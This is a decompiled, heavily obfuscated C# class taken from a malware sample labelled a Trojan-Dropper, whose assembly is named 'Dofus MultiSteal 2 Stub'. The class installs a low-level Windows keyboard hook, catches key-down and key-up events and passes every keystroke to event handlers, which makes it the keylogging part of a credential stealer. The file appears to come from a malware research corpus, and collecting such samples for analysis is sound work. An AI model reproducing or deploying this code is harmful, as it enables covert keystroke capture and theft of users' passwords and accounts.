MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1/╍秀骒豜㤨灮燃.cs

// Decompiled with JetBrains decompiler
// Type: ╍秀骒豜㤨灮燃
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: F8CCC811-F0AE-43F4-8180-670E2BBAD259
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1.exe

using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;

internal class \u254D秀\uEB37骒豜㤨灮燃
{
  private const int 聪ዶ锯棧軅ꘚ塃掑 = 13;
  private const int \uEA6A嗣\uEEB8\uEFAD\u2379쾽\u1CB0᷑ = 0;
  private const int 觱䎺忓봸\u3297唗筈育 = 256;
  private const int 틀톞鴴\u05CC\uE775ဍ\u329C\uE5B5 = 257;
  private const int \u08DE낍\uFDE0鑷踪뢊ᆞᚾ = 260;
  private const int 퍽ু騜頟\uF069㤡恵Ά = 261;
  private \u254D秀\uEB37骒豜㤨灮燃.\uEA0Cퟐ\uEDFDשּׁ퇌ﰆᯙ쀳 ꚣ瀕粬퐊Џ웹\uECC0\uE1C1;
  private IntPtr \uFFFD능ﳇ\u240E賹홝Л뻹;

  [DllImport("User32.dll", EntryPoint = "SetWindowsHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
  private static extern int ᛝᮯ죄ჷ箉䖯ᬆ坁(
    int _param0,
    \u254D秀\uEB37骒豜㤨灮燃.\uEA0Cퟐ\uEDFDשּׁ퇌ﰆᯙ쀳 _param1,
    IntPtr _param2,
    int ὲ扳鯠Ⰼ颵ꤔ깧癸);

  [DllImport("User32.dll", EntryPoint = "CallNextHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
  private static extern int ㄖ㥼曻\u0DC9쓴鸁슱鯬(
    int _param0,
    int _param1,
    IntPtr ὲ扳鯠Ⰼ颵ꤔ깧癸,
    IntPtr _param3);

  [DllImport("User32.dll", EntryPoint = "UnhookWindowsHookEx", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
  private static extern bool 떦꺬멦\u2655ມ䪰셀\uF684(int _param0);

  public static event \u254D秀\uEB37骒豜㤨灮燃.\u2F71愨\uE5ECಚ‭瞹毚췪 촒뉾럘灞磙ฦ鑘䛥;

  public static event \u254D秀\uEB37骒豜㤨灮燃.ꌩ珤蒴\uED69胲\u28C5ዮ墁 \uED02铻\u087E縭镚㬌\uF7D3յ;

  private int 旮괺௫\u240E哘\u2ED2\u23DB\uE9AB(int _param1, IntPtr ὲ扳鯠Ⰼ颵ꤔ깧癸, IntPtr _param3)
  {
    if (_param1 == 0)
    {
      IntPtr num = ὲ扳鯠Ⰼ颵ꤔ깧癸;
      \u254D秀\uEB37骒豜㤨灮燃.혣㮕〼嵔\uE7D1餲楌㽌 혣㮕〼嵔餲楌㽌1;
      \u254D秀\uEB37骒豜㤨灮燃.혣㮕〼嵔\uE7D1餲楌㽌 혣㮕〼嵔餲楌㽌2;
      if (!쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(256)) && !쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(260)))
      {
        if (쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(257)) || 쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(num, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(261)))
        {
          \u254D秀\uEB37骒豜㤨灮燃.ꌩ珤蒴\uED69胲\u28C5ዮ墁 陖ꖲ蜠咾ᎃ = \u254D秀\uEB37骒豜㤨灮燃.陖\uE51Cꖲ\uE27C\u28A5蜠咾ᎃ;
          if (陖ꖲ蜠咾ᎃ != null)
          {
            \u254D秀\uEB37骒豜㤨灮燃.ꌩ珤蒴\uED69胲\u28C5ዮ墁 ꌩ珤蒴胲ዮ墁 = 陖ꖲ蜠咾ᎃ;
            object obj = \uFFFD溦䓞콺ᕿٻ猶呶.晼驿㸙\u2FED瑲\u066C\uEFE1胧(_param3, ᆔኾꗘ몇砍섕뢅\u32D0.\uE12E\uF423ꍨ脱\uFFFD쇧\uFE5E\uE31D((object) 혣㮕〼嵔餲楌㽌1));
            int 顣飛旳䣕굧괠 = checked ((int) (unchecked (obj != null) ? (\u254D秀\uEB37骒豜㤨灮燃.혣㮕〼嵔\uE7D1餲楌㽌) obj : 혣㮕〼嵔餲楌㽌2).\uEFFE顣飛旳\u274C䣕굧괠);
            䅑\uECF1웿\uF3D7稫瓎넇\uEC79.酫ܥ療\u180Fᾚ骠葔鏞((object) ꌩ珤蒴胲ዮ墁, (Keys) 顣飛旳䣕굧괠);
          }
        }
      }
      else
      {
        \u254D秀\uEB37骒豜㤨灮燃.\u2F71愨\uE5ECಚ‭瞹毚췪 貵譑摩ꉮ띮짅풿 = \u254D秀\uEB37骒豜㤨灮燃.貵譑摩ꉮ띮짅풿\uEDD6;
        if (貵譑摩ꉮ띮짅풿 != null)
        {
          \u254D秀\uEB37骒豜㤨灮燃.\u2F71愨\uE5ECಚ‭瞹毚췪 愨ಚ‭瞹毚췪 = 貵譑摩ꉮ띮짅풿;
          object obj = \uFFFD溦䓞콺ᕿٻ猶呶.晼驿㸙\u2FED瑲\u066C\uEFE1胧(_param3, ᆔኾꗘ몇砍섕뢅\u32D0.\uE12E\uF423ꍨ脱\uFFFD쇧\uFE5E\uE31D((object) 혣㮕〼嵔餲楌㽌1));
          int 顣飛旳䣕굧괠 = checked ((int) (unchecked (obj != null) ? (\u254D秀\uEB37骒豜㤨灮燃.혣㮕〼嵔\uE7D1餲楌㽌) obj : 혣㮕〼嵔餲楌㽌2).\uEFFE顣飛旳\u274C䣕굧괠);
          긜\uFFFD仴修歮ᐬ걳ｄ.䟐쇹餁闹凧얤ج뎃((object) 愨ಚ‭瞹毚췪, (Keys) 顣飛旳䣕굧괠);
        }
      }
    }
    return 囖㑃뺽뇠ﮀ\uF6FB\uF73E腘.垛扶䈮拺括螎㠩禘(浤솑\uFFFD켅ᇛ\u00A6닂鳧.伲霏\u2260㼄㵖劆ἄⅆ(IntPtr.Zero), _param1, ὲ扳鯠Ⰼ颵ꤔ깧癸, _param3);
  }

  public \u254D秀\uEB37骒豜㤨灮燃()
  {
    \u254D秀\uEB37骒豜㤨灮燃 TargetObject = this;
    // ISSUE: virtual method pointer
    this.ꚣ瀕粬퐊Џ웹\uECC0\uE1C1 = new \u254D秀\uEB37骒豜㤨灮燃.\uEA0Cퟐ\uEDFDשּׁ퇌ﰆᯙ쀳((object) TargetObject, __vmethodptr(TargetObject, 旮괺௫\u240E哘\u2ED2\u23DB\uE9AB));
    this.\uFFFD능ﳇ\u240E賹홝Л뻹 = IntPtr.Zero;
    this.\uFFFD능ﳇ\u240E賹홝Л뻹 = \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(㴰忚팒泫\uE26C沶叝殈.糵ꔫᆝ詬賴눶늈\uFFFD(13, this.ꚣ瀕粬퐊Џ웹\uECC0\uE1C1, \u28DC결ַ퓽ᢺ䆲\uEC3A䈔.\u0D58㠂繌\uE87A턔ᅖ傯좲(㞨冈爁\uF331罜\uF6F3䂻䠻.堠逑獹ꥷআᖀⰸꏦ(Գ䢽\u1CA5\u0608\uE96Dꨥ\u9FEAઉ.옙﨣\u09C6荪鑸딇粨\u204F((object) \u20FB\uAB1D\u3228燽\u2B8Aꭎⱘ녧.\uEA74먪珢遊샲Ⴎ\u0FD9\uF809())[0]).ToInt32()), 0));
    if (쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(this.\uFFFD능ﳇ\u240E賹홝Л뻹, IntPtr.Zero))
      throw \u26FC諵㪟ꌀ\uFFFD닅\uEE89\u25F6.渒怫虑ᨢ\u273D㑰칗뒹((string) \u003CModule\u003E.\u0615\uFFFD\uFFFD\uFFFDh\u0027\uFFFD\uFFFD\u007E\u001Ann\uFFFD\uFFFD\uFFFD(1356576151U));
  }

  ~\u254D秀\uEB37骒豜㤨灮燃()
  {
    if (!쎔\uA83F\uFFFD\u27BA\u21C8퐔陕讍.짬띗繨ꤙ驌ꜚ눬㼳(this.\uFFFD능ﳇ\u240E賹홝Л뻹, IntPtr.Zero))
      goto label_2;
label_1:
    꿲\u2611툹쥦ˣꔭ\u246D慞.\u28E7乼ꕲ醴䗄䐠ⲱ돩((object) this);
    return;
label_2:
    昞ꗤ\uE388ﵵ醍๔곞苦.\u2AB1剙백諺ᙕ䛛訐\uE936(浤솑\uFFFD켅ᇛ\u00A6닂鳧.伲霏\u2260㼄㵖劆ἄⅆ(this.\uFFFD능ﳇ\u240E賹홝Л뻹));
    goto label_1;
  }

  private struct 혣㮕〼嵔\uE7D1餲楌㽌
  {
    public uint \uEFFE顣飛旳\u274C䣕굧괠;
    public uint ꦑ쯬贕〯\u2FEA둱\uE7B2誅;
    public \u254D秀\uEB37骒豜㤨灮燃.䚉ꌵ眿竦댃ꅛﶡᥪ 鼃澵\uABFD\uFFFD\uFBCF\u28B5\u2A63寒;
    public uint \u104CẆʭ跒㝀灮陋Ζ;
    public UIntPtr \u2586\u2F0B빁쏧ង塹荚顄;
  }

  [Flags]
  private enum 䚉ꌵ眿竦댃ꅛﶡᥪ : uint
  {
    LLKHF_EXTENDED = 1,
    LLKHF_INJECTED = 16, // 0x00000010
    LLKHF_ALTDOWN = 32, // 0x00000020
    LLKHF_UP = 128, // 0x00000080
  }

  public delegate void \u2F71愨\uE5ECಚ‭瞹毚췪(Keys Key);

  public delegate void ꌩ珤蒴\uED69胲\u28C5ዮ墁(Keys Key);

  private delegate int \uEA0Cퟐ\uEDFDשּׁ퇌ﰆᯙ쀳(int nCode, IntPtr wParam, IntPtr lParam);
}